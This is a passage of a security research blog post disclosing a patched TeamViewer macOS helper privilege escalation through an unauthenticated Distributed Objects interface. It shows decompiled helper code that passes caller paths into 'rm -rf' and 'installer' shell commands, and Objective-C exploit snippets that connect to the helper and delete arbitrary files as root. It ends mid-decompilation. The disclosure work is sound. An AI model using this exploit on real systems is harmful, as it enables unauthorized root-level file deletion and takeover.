<!DOCTYPE html>
<html lang="en">

  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta name="author" content="Csaba Fitzl">
    
    

    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="NOCVE - TeamViewer Local Privilege Escalation Vulnerability"/>
<meta name="twitter:description" content="Intro This is a rather old vulnerability I found in TeamViewer back in 2020, and reported it through VCP/iDefense. TeamViewer fixed the vulnerability last November, but somehow I missed it, and became aware of it only recently. Their advisory can be found here: November updates - Security patches — TeamViewer Support
The TeamViewer macOS client used a PrivilegedHelperTool named com.teamviewer.Helper to perform specific tasks that require root permissions. Back in 2020 it used a deprecate model to perform IPC communication, called Distributed Objects."/>

    <meta property="og:title" content="NOCVE - TeamViewer Local Privilege Escalation Vulnerability" />
<meta property="og:description" content="Intro This is a rather old vulnerability I found in TeamViewer back in 2020, and reported it through VCP/iDefense. TeamViewer fixed the vulnerability last November, but somehow I missed it, and became aware of it only recently. Their advisory can be found here: November updates - Security patches — TeamViewer Support
The TeamViewer macOS client used a PrivilegedHelperTool named com.teamviewer.Helper to perform specific tasks that require root permissions. Back in 2020 it used a deprecate model to perform IPC communication, called Distributed Objects." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://theevilbit.github.io/posts/teamviewer_lpe/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-05-26T00:00:00+00:00" />
<meta property="article:modified_time" content="2021-05-26T00:00:00+00:00" />


    
      <base href="https://theevilbit.github.io/posts/teamviewer_lpe/">
    
    <title>
  NOCVE - TeamViewer Local Privilege Escalation Vulnerability · theevilbit blog
</title>

    
      <link rel="canonical" href="https://theevilbit.github.io/posts/teamviewer_lpe/">
    

    <link href="https://fonts.googleapis.com/css?family=Lato:400,700%7CMerriweather:300,700%7CSource+Code+Pro:400,700" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.1/css/all.css" integrity="sha384-50oBUHEmvpQ+1lW4y57PTFmhCaXp0ML5d60M1M7uH2+nqUivzIebhndOJK28anvf" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css" integrity="sha256-l85OmPOjvil/SOvVt3HnSSjzF1TUMyT9eV0c2BzEGzU=" crossorigin="anonymous" />

    
      
      
      <link rel="stylesheet" href="https://theevilbit.github.io/css/coder.min.28d751104f30c16da1aa1bb04015cbe662cacfe0d1b01af4f2240ad58580069c.css" integrity="sha256-KNdREE8wwW2hqhuwQBXL5mLKz&#43;DRsBr08iQK1YWABpw=" crossorigin="anonymous" media="screen" />
    

    

    

    

    
    
    <link rel="icon" type="image/png" href="https://theevilbit.github.io/images/favicon-32x32.png" sizes="32x32">
    <link rel="icon" type="image/png" href="https://theevilbit.github.io/images/favicon-16x16.png" sizes="16x16">

    <meta name="generator" content="Hugo 0.111.3">
  </head>

  <body class=" ">
    <main class="wrapper">
      <nav class="navigation">
  <section class="container">
    <a class="navigation-title" href="https://theevilbit.github.io/">
      theevilbit blog
    </a>
    <input type="checkbox" id="menu-toggle" />
    <label class="menu-button float-right" for="menu-toggle"><i class="fas fa-bars"></i></label>
    <ul class="navigation-list">
      
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://theevilbit.github.io/posts/">Posts</a>
          </li>
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://theevilbit.github.io/shield/">Shield.app</a>
          </li>
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://theevilbit.github.io/beyond/">Beyond good ol&#39; LaunchAgents</a>
          </li>
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://theevilbit.github.io/tags/">Tags</a>
          </li>
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://theevilbit.github.io/categories/">Categories</a>
          </li>
        
          <li class="navigation-item">
            <a class="navigation-link" href="https://theevilbit.github.io/about/">About</a>
          </li>
        
      
      
    </ul>
  </section>
</nav>


      <div class="content">
        
  <section class="container post">
    <article>
      <header>
        <div class="post-title">
          <h1 class="title">NOCVE - TeamViewer Local Privilege Escalation Vulnerability</h1>
        </div>
        <div class="post-meta">
          <div class="date">
            <span class="posted-on">
              <i class="fas fa-calendar"></i>
              <time datetime='2021-05-26T00:00:00Z'>
                May 26, 2021
              </time>
            </span>
            <span class="reading-time">
              <i class="fas fa-clock"></i>
              6 minutes read
            </span>
          </div>
          <div class="categories">
  <i class="fas fa-folder"></i>
    <a href="https://theevilbit.github.io/categories/blog/">BLOG</a></div>

          <div class="tags">
  <i class="fas fa-tag"></i>
    <a href="https://theevilbit.github.io/tags/macos/">macos</a>
      <span class="separator">•</span>
    <a href="https://theevilbit.github.io/tags/lpe/">lpe</a>
      <span class="separator">•</span>
    <a href="https://theevilbit.github.io/tags/exploit/">exploit</a></div>

        </div>
      </header>

      <div>
        <h2 id="intro">Intro</h2>
<p>This is a rather old vulnerability I found in TeamViewer back in 2020, and reported it through VCP/iDefense. TeamViewer fixed the vulnerability last November, but somehow I missed it, and became aware of it only recently. Their advisory can be found here:
<a href="https://community.teamviewer.com/English/discussion/107710/november-updates-security-patches">November updates - Security patches — TeamViewer Support</a></p>
<p>The TeamViewer macOS client used a PrivilegedHelperTool named <code>com.teamviewer.Helper</code> to perform specific tasks that require <code>root</code>
permissions. Back in 2020 it used a deprecate model to perform IPC communication, called Distributed Objects. It was wide open, and any client could invoke the remote object&rsquo;s functions, and some of those lead to direct privilege escalation.</p>
<h2 id="the-distributed-objects-interface">The Distributed Objects interface</h2>
<p>Apple&rsquo;s developer document regarding Distributed Objects can be found here:
<a href="https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/DistrObjects/DistrObjects.html">Introduction to Distributed Objects</a>
Ian Beer from Google Project zero also talked about these:
<a href="https://googleprojectzero.blogspot.com/2015/09/revisiting-apple-ipc-1-distributed_28.html">Project Zero: Revisiting Apple IPC: (1) Distributed Objects</a>.</p>
<p>It&rsquo;s somewhat similar to NSXPC on a very high level. Let&rsquo;s see how we can identify and exploit it.</p>
<h2 id="the-privilegedhelpertool">The PrivilegedHelperTool</h2>
<p>If we decompile the EntryPoint of the helper tool we can spot that it uses this interface.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f0f3f3;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-objectivec" data-lang="objectivec"><span style="display:flex;"><span><span style="color:#078;font-weight:bold">int</span> <span style="color:#c0f">EntryPoint</span>(<span style="color:#078;font-weight:bold">int</span> arg0, <span style="color:#078;font-weight:bold">int</span> arg1, <span style="color:#078;font-weight:bold">int</span> arg2, <span style="color:#078;font-weight:bold">int</span> arg3) {
</span></span><span style="display:flex;"><span>    rax <span style="color:#555">=</span> sub_10000612d();
</span></span><span style="display:flex;"><span>    rax <span style="color:#555">=</span> [rax <span style="color:#069;font-weight:bold">retain</span>];
</span></span><span style="display:flex;"><span>    r13 <span style="color:#555">=</span> rax;
</span></span><span style="display:flex;"><span>    <span style="color:#069;font-weight:bold">if</span> (rax <span style="color:#555">!=</span> <span style="color:#f60">0x0</span>) {
</span></span><span style="display:flex;"><span>            r15 <span style="color:#555">=</span> [[NSConnection <span style="color:#99f">connectionWithReceivePort</span>:r13 <span style="color:#99f">sendPort</span>:<span style="color:#f60">0x0</span>] <span style="color:#069;font-weight:bold">retain</span>];
</span></span><span style="display:flex;"><span>            rax <span style="color:#555">=</span> [BlessedHelperDistantObject alloc];
</span></span><span style="display:flex;"><span>            rax <span style="color:#555">=</span> [rax init];
</span></span><span style="display:flex;"><span>            r12 <span style="color:#555">=</span> rax;
</span></span><span style="display:flex;"><span>            [r15 <span style="color:#99f">setRootObject</span>:rax];
</span></span><span style="display:flex;"><span>            rax <span style="color:#555">=</span> [NSRunLoop currentRunLoop];
</span></span><span style="display:flex;"><span>            rax <span style="color:#555">=</span> [rax <span style="color:#069;font-weight:bold">retain</span>];
</span></span><span style="display:flex;"><span>            [rax run];
</span></span><span style="display:flex;"><span>            rbx <span style="color:#555">=</span> <span style="color:#f60">0x0</span>;
</span></span><span style="display:flex;"><span>            [rax <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>            [r12 <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>            [r15 <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    <span style="color:#069;font-weight:bold">else</span> {
</span></span><span style="display:flex;"><span>            rbx <span style="color:#555">=</span> <span style="color:#f60">0x1</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    [r13 <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    rax <span style="color:#555">=</span> rbx;
</span></span><span style="display:flex;"><span>    <span style="color:#069;font-weight:bold">return</span> rax;
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#078;font-weight:bold">void</span> <span style="color:#c0f">sub_10000612d</span>() {
</span></span><span style="display:flex;"><span>    rax <span style="color:#555">=</span> launch_data_new_string(<span style="color:#c30">&#34;CheckIn&#34;</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#069;font-weight:bold">if</span> (rax <span style="color:#555">!=</span> <span style="color:#f60">0x0</span>) {
</span></span><span style="display:flex;"><span>            r15 <span style="color:#555">=</span> rax;
</span></span><span style="display:flex;"><span>            rax <span style="color:#555">=</span> launch_msg(rax);
</span></span><span style="display:flex;"><span>            <span style="color:#069;font-weight:bold">if</span> (rax <span style="color:#555">!=</span> <span style="color:#f60">0x0</span>) {
</span></span><span style="display:flex;"><span>                    r14 <span style="color:#555">=</span> rax;
</span></span><span style="display:flex;"><span>                    rax <span style="color:#555">=</span> launch_data_dict_lookup(rax, <span style="color:#c30">&#34;Label&#34;</span>);
</span></span><span style="display:flex;"><span>                    <span style="color:#069;font-weight:bold">if</span> (rax <span style="color:#555">!=</span> <span style="color:#f60">0x0</span>) {
</span></span><span style="display:flex;"><span>                            r12 <span style="color:#555">=</span> launch_data_get_string(rax);
</span></span><span style="display:flex;"><span>                    }
</span></span><span style="display:flex;"><span>                    <span style="color:#069;font-weight:bold">else</span> {
</span></span><span style="display:flex;"><span>                            r12 <span style="color:#555">=</span> <span style="color:#f60">0x0</span>;
</span></span><span style="display:flex;"><span>                    }
</span></span><span style="display:flex;"><span>                    rax <span style="color:#555">=</span> launch_data_dict_lookup(r14, <span style="color:#c30">&#34;MachServices&#34;</span>);
</span></span><span style="display:flex;"><span>                    rbx <span style="color:#555">=</span> <span style="color:#f60">0x0</span>;
</span></span><span style="display:flex;"><span>                    <span style="color:#069;font-weight:bold">if</span> (r12 <span style="color:#555">!=</span> <span style="color:#f60">0x0</span>) {
</span></span><span style="display:flex;"><span>                            rbx <span style="color:#555">=</span> <span style="color:#f60">0x0</span>;
</span></span><span style="display:flex;"><span>                            <span style="color:#069;font-weight:bold">if</span> (rax <span style="color:#555">!=</span> <span style="color:#f60">0x0</span>) {
</span></span><span style="display:flex;"><span>                                    rax <span style="color:#555">=</span> launch_data_dict_lookup(rax, r12);
</span></span><span style="display:flex;"><span>                                    <span style="color:#069;font-weight:bold">if</span> (rax <span style="color:#555">!=</span> <span style="color:#f60">0x0</span>) {
</span></span><span style="display:flex;"><span>                                            rax <span style="color:#555">=</span> launch_data_get_machport(rax);
</span></span><span style="display:flex;"><span>                                            <span style="color:#069;font-weight:bold">if</span> (rax <span style="color:#555">!=</span> <span style="color:#f60">0x0</span>) {
</span></span><span style="display:flex;"><span>                                                    rbx <span style="color:#555">=</span> [[NSMachPort alloc] <span style="color:#99f">initWithMachPort</span>:rax];
</span></span><span style="display:flex;"><span>                                            }
</span></span><span style="display:flex;"><span>                                            <span style="color:#069;font-weight:bold">else</span> {
</span></span><span style="display:flex;"><span>                                                    rbx <span style="color:#555">=</span> <span style="color:#f60">0x0</span>;
</span></span><span style="display:flex;"><span>                                            }
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                    <span style="color:#069;font-weight:bold">else</span> {
</span></span><span style="display:flex;"><span>                                            rbx <span style="color:#555">=</span> <span style="color:#f60">0x0</span>;
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                            }
</span></span><span style="display:flex;"><span>                    }
</span></span><span style="display:flex;"><span>                    launch_data_free(r14);
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>            <span style="color:#069;font-weight:bold">else</span> {
</span></span><span style="display:flex;"><span>                    rbx <span style="color:#555">=</span> <span style="color:#f60">0x0</span>;
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>            launch_data_free(r15);
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    <span style="color:#069;font-weight:bold">else</span> {
</span></span><span style="display:flex;"><span>            rbx <span style="color:#555">=</span> <span style="color:#f60">0x0</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    [rbx autorelease];
</span></span><span style="display:flex;"><span>    <span style="color:#069;font-weight:bold">return</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p><code>NSConnection</code> is a clear indication, but the <code>launch_data_*</code> also a good hint towards this.</p>
<p>Based on the name, we can make an educated guess that the class responsible for the connection is <code>BlessedHelperDistantObject</code>. If we do a class-dump on the help tool, we can get the class interface.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f0f3f3;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-objectivec" data-lang="objectivec"><span style="display:flex;"><span><span style="color:#069;font-weight:bold">@interface</span> <span style="color:#0a8;font-weight:bold">BlessedHelperDistantObject</span> : <span style="color:#0a8;font-weight:bold">NSObject</span> <span style="color:#555">&lt;</span>BlessedHelperProxy<span style="color:#555">&gt;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#069;font-weight:bold">struct</span> AuthorizationOpaqueRef <span style="color:#555">*</span>_authorization;
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#069;font-weight:bold">@property</span>(<span style="color:#069;font-weight:bold">nonatomic</span>) <span style="color:#069;font-weight:bold">struct</span> AuthorizationOpaqueRef <span style="color:#555">*</span>authorization; <span style="color:#09f;font-style:italic">// @synthesize authorization=_authorization;
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span>- (<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">uninstallRemotePrinting:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">BOOL</span>)<span style="color:#c0f">installRemotePrinting:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">configureTestMaster:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">deleteAuthPlugin</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">BOOL</span>)<span style="color:#c0f">helperSignatureMatchesSignatureOfBundleAtURL:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span> <span style="color:#c0f">helperName:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg2</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#069;font-weight:bold">struct</span> __SecRequirement <span style="color:#555">*</span>)<span style="color:#c0f">copyOwnRequirementForHelperName:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">uninstall:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">writeLaunchdPropertyLists:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">deleteTVinOverridesPlist:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">loadDaemon:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">BOOL</span>)<span style="color:#c0f">run:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">terminate</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">BOOL</span>)<span style="color:#c0f">runWithArguments:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span> <span style="color:#c0f">helperName:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg2</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">BOOL</span>)<span style="color:#c0f">needsUpdate:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg1</span> <span style="color:#c0f">helperName:</span>(<span style="color:#078;font-weight:bold">id</span>)<span style="color:#033">arg2</span>;
</span></span><span style="display:flex;"><span><span style="color:#069;font-weight:bold">@property</span>(<span style="color:#069;font-weight:bold">readonly</span>, <span style="color:#069;font-weight:bold">copy</span>, <span style="color:#069;font-weight:bold">nonatomic</span>) NSString <span style="color:#555">*</span>version;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">dealloc</span>;
</span></span><span style="display:flex;"><span>- (<span style="color:#078;font-weight:bold">id</span>)<span style="color:#c0f">init</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic">// Remaining properties
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span><span style="color:#069;font-weight:bold">@property</span>(<span style="color:#069;font-weight:bold">readonly</span>, <span style="color:#069;font-weight:bold">copy</span>) NSString <span style="color:#555">*</span>debugDescription;
</span></span><span style="display:flex;"><span><span style="color:#069;font-weight:bold">@property</span>(<span style="color:#069;font-weight:bold">readonly</span>, <span style="color:#069;font-weight:bold">copy</span>) NSString <span style="color:#555">*</span>description;
</span></span><span style="display:flex;"><span><span style="color:#069;font-weight:bold">@property</span>(<span style="color:#069;font-weight:bold">readonly</span>) <span style="color:#078;font-weight:bold">unsigned</span> <span style="color:#078;font-weight:bold">long</span> <span style="color:#078;font-weight:bold">long</span> hash;
</span></span><span style="display:flex;"><span><span style="color:#069;font-weight:bold">@property</span>(<span style="color:#069;font-weight:bold">readonly</span>) <span style="color:#078;font-weight:bold">Class</span> superclass;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#069;font-weight:bold">@end</span>
</span></span></code></pre></div><p>There are quite a few interesting methods, but we will focus on <code>installRemotePrinting</code> and <code>uninstallRemotePrinting</code>. Unfortunately we don&rsquo;t get an indication of the passed arguments from the class-dump.</p>
<h2 id="uninstallremoteprinting---arbitrary-file-deletion">uninstallRemotePrinting - Arbitrary file deletion</h2>
<p>Let&rsquo;s inspect  <code>uninstallRemotePrinting</code> first.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f0f3f3;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-objectivec" data-lang="objectivec"><span style="display:flex;"><span><span style="color:#09f;font-style:italic">/* @class BlessedHelperDistantObject */</span>
</span></span><span style="display:flex;"><span>-(<span style="color:#078;font-weight:bold">void</span>)<span style="color:#c0f">uninstallRemotePrinting:</span>(<span style="color:#078;font-weight:bold">void</span> <span style="color:#555">*</span>)<span style="color:#033">arg2</span> {
</span></span><span style="display:flex;"><span>    system([objc_retainAutorelease([[NSString <span style="color:#99f">stringWithFormat</span>:<span style="color:#c30">@&#34;rm -rf &#39;%@&#39;&#34;</span>, [[[[arg2 stringArguments] <span style="color:#069;font-weight:bold">retain</span>] remotePrintingPPDPath] <span style="color:#069;font-weight:bold">retain</span>]] <span style="color:#069;font-weight:bold">retain</span>]) UTF8String]);
</span></span><span style="display:flex;"><span>    [rax <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    [rax <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    r14 <span style="color:#555">=</span> [[rax remotePrintingFilterPath] <span style="color:#069;font-weight:bold">retain</span>];
</span></span><span style="display:flex;"><span>    system([objc_retainAutorelease([[NSString <span style="color:#99f">stringWithFormat</span>:<span style="color:#c30">@&#34;rm -rf &#39;%@&#39;&#34;</span>, r14] <span style="color:#069;font-weight:bold">retain</span>]) UTF8String]);
</span></span><span style="display:flex;"><span>    [rax <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    [r14 <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    system([objc_retainAutorelease([[NSString <span style="color:#99f">stringWithFormat</span>:<span style="color:#c30">@&#34;rm -rf &#39;%@&#39;&#34;</span>, [[rax remotePrintingPrinterIconPath] <span style="color:#069;font-weight:bold">retain</span>]] <span style="color:#069;font-weight:bold">retain</span>]) UTF8String]);
</span></span><span style="display:flex;"><span>    [rax <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    [rax <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    system([objc_retainAutorelease([[NSString <span style="color:#99f">stringWithFormat</span>:<span style="color:#c30">@&#34;rm -rf &#39;%@&#39;&#34;</span>, [[rax remotePrintingDatabasePath] <span style="color:#069;font-weight:bold">retain</span>]] <span style="color:#069;font-weight:bold">retain</span>]) UTF8String]);
</span></span><span style="display:flex;"><span>    [rax <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    [rax <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    [rax <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    <span style="color:#069;font-weight:bold">return</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>We find that it will run four system commands based on the argument we pass in, and it will delete four files or directories. The argument we pass should have a <code>stringArguments</code> property, which will also have a <code>remotePrintingPPDPath</code> property. Inspecting the class-dump, we can find the class with this property.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f0f3f3;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-objectivec" data-lang="objectivec"><span style="display:flex;"><span><span style="color:#069;font-weight:bold">@interface</span> <span style="color:#0a8;font-weight:bold">HelperArguments</span> : <span style="color:#0a8;font-weight:bold">NSObject</span> <span style="color:#555">&lt;</span>NSCopying, NSCoding<span style="color:#555">&gt;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>(...)
</span></span><span style="display:flex;"><span>    NSString <span style="color:#555">*</span>_bundlePath;
</span></span><span style="display:flex;"><span>    NSString <span style="color:#555">*</span>_processLockName;
</span></span><span style="display:flex;"><span>    HelperStringArguments <span style="color:#555">*</span>_stringArguments;
</span></span><span style="display:flex;"><span>    TestMasterConfiguration <span style="color:#555">*</span>_testMasterConfig;
</span></span><span style="display:flex;"><span>    NSString <span style="color:#555">*</span>_appPath;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Based on this we can conclude that the main object that is being sent via the connection is the <code>HelperArguments</code> which has a<code>stringArguments</code> property of the class type <code>HelperStringArguments</code>. We can find that class also in the class-dump.</p>
<pre tabindex="0"><code>@interface HelperStringArguments : NSObject &lt;NSCopying, NSCoding&gt;
{
(...)
    NSString *_remotePrintingInstallPkgName;
    NSString *_remotePrintingPPDPath;
    NSString *_remotePrintingFilterPath;
    NSString *_remotePrintingPrinterIconPath;
    NSString *_remotePrintingDatabasePath;
(...)
}
</code></pre><p>That class has a <code>remotePrintingPPDPath</code> property along with plenty of other NSString objects.</p>
<p>To exploit this method we need to implement these classes, and create an object and setup their properties. This is shown below.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f0f3f3;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-objectivec" data-lang="objectivec"><span style="display:flex;"><span>   <span style="color:#09f;font-style:italic">//setup parameters
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span>    HelperStringArguments <span style="color:#555">*</span> hsa <span style="color:#555">=</span> [HelperStringArguments new];
</span></span><span style="display:flex;"><span>     <span style="color:#09f;font-style:italic">//uninstallRemotePrinting will use these 4, any file specified here will be deleted
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span>    hsa.remotePrintingPPDPath <span style="color:#555">=</span> <span style="color:#c30">@&#34;/Library/a.txt&#34;</span>;
</span></span><span style="display:flex;"><span>    hsa.remotePrintingDatabasePath <span style="color:#555">=</span> <span style="color:#c30">@&#34;/Library/b.txt&#34;</span>;
</span></span><span style="display:flex;"><span>    hsa.remotePrintingPrinterIconPath<span style="color:#555">=</span> <span style="color:#c30">@&#34;/Library/c.txt&#34;</span>;
</span></span><span style="display:flex;"><span>    hsa.remotePrintingFilterPath <span style="color:#555">=</span> <span style="color:#c30">@&#34;/Library/d.txt&#34;</span>;
</span></span><span style="display:flex;"><span>     
</span></span><span style="display:flex;"><span>    <span style="color:#09f;font-style:italic">//we create our object
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span>    HelperArguments <span style="color:#555">*</span> helperargs <span style="color:#555">=</span> [[HelperArguments alloc] init];
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#09f;font-style:italic">//we need to embed HelperStringArguments
</span></span></span><span style="display:flex;"><span><span style="color:#09f;font-style:italic"></span>    helperargs.stringArguments <span style="color:#555">=</span> hsa;
</span></span></code></pre></div><p>To connect to the remote helper is fairly simple.</p>
<pre tabindex="0"><code>    NSConnection *c = [NSConnection connectionWithRegisteredName:@&#34;com.teamviewer.Helper&#34; host:nil];
    BlessedHelperDistantObject *proxy = (BlessedHelperDistantObject *)[c rootProxy];
    [proxy uninstallRemotePrinting:helperargs];
</code></pre><p>We create an <code>NSConnection</code> and then call the remote methods. The files we specify above will be deleted.</p>
<h2 id="installremoteprinting---user-to-root-privilege-escalation">installRemotePrinting - user to root privilege escalation</h2>
<p>The <code>installRemotePrinting:</code> method allows us to escalate our privileges to root. It&rsquo;s shown below.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f0f3f3;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-objectivec" data-lang="objectivec"><span style="display:flex;"><span><span style="color:#09f;font-style:italic">/* @class BlessedHelperDistantObject */</span>
</span></span><span style="display:flex;"><span>-(<span style="color:#078;font-weight:bold">char</span>)<span style="color:#c0f">installRemotePrinting:</span>(<span style="color:#078;font-weight:bold">void</span> <span style="color:#555">*</span>)<span style="color:#033">arg2</span> {
</span></span><span style="display:flex;"><span>    r15 <span style="color:#555">=</span> [arg2 <span style="color:#069;font-weight:bold">retain</span>];
</span></span><span style="display:flex;"><span>    r13 <span style="color:#555">=</span> [[arg2 stringArguments] <span style="color:#069;font-weight:bold">retain</span>];
</span></span><span style="display:flex;"><span>    rbx <span style="color:#555">=</span> [[arg2 bundlePath] <span style="color:#069;font-weight:bold">retain</span>];
</span></span><span style="display:flex;"><span>    [r15 <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    r15 <span style="color:#555">=</span> [[rbx <span style="color:#99f">stringByAppendingPathComponent</span>:<span style="color:#c30">@&#34;Contents/Resources&#34;</span>] <span style="color:#069;font-weight:bold">retain</span>];
</span></span><span style="display:flex;"><span>    [rbx <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    var_38 <span style="color:#555">=</span> r13;
</span></span><span style="display:flex;"><span>    rax <span style="color:#555">=</span> [r13 remotePrintingInstallPkgName];
</span></span><span style="display:flex;"><span>    rax <span style="color:#555">=</span> [rax <span style="color:#069;font-weight:bold">retain</span>];
</span></span><span style="display:flex;"><span>    var_30 <span style="color:#555">=</span> r15;
</span></span><span style="display:flex;"><span>    r12 <span style="color:#555">=</span> [[r15 <span style="color:#99f">stringByAppendingPathComponent</span>:rax] <span style="color:#069;font-weight:bold">retain</span>];
</span></span><span style="display:flex;"><span>    [rax <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    rax <span style="color:#555">=</span> [NSFileManager defaultManager];
</span></span><span style="display:flex;"><span>    rax <span style="color:#555">=</span> [rax <span style="color:#069;font-weight:bold">retain</span>];
</span></span><span style="display:flex;"><span>    r13 <span style="color:#555">=</span> [rax <span style="color:#99f">fileExistsAtPath</span>:r12];
</span></span><span style="display:flex;"><span>    [rax <span style="color:#069;font-weight:bold">release</span>];
</span></span><span style="display:flex;"><span>    <span style="color:#069;font-weight:bold">if</span> (r13 <span style="color:#555">!=</span> <span style="color:#f60">0x0</span>) {
</span></span><span style="display:flex;"><span>            system([objc_retainAutorelease([[NSString <span style="color:#99f">stringWithFormat</span>:<span style="color:#c30">@&#34;installer -pkg &#39;%@&#39; -target /&#34;</span>, r12] <span style="color:#069;font-weight:bold">retain</span>]) UTF8String]);
</span></span><span style="display:flex;"><span>            [rax <span style="color:#069;font-weight:bold">release</span>];
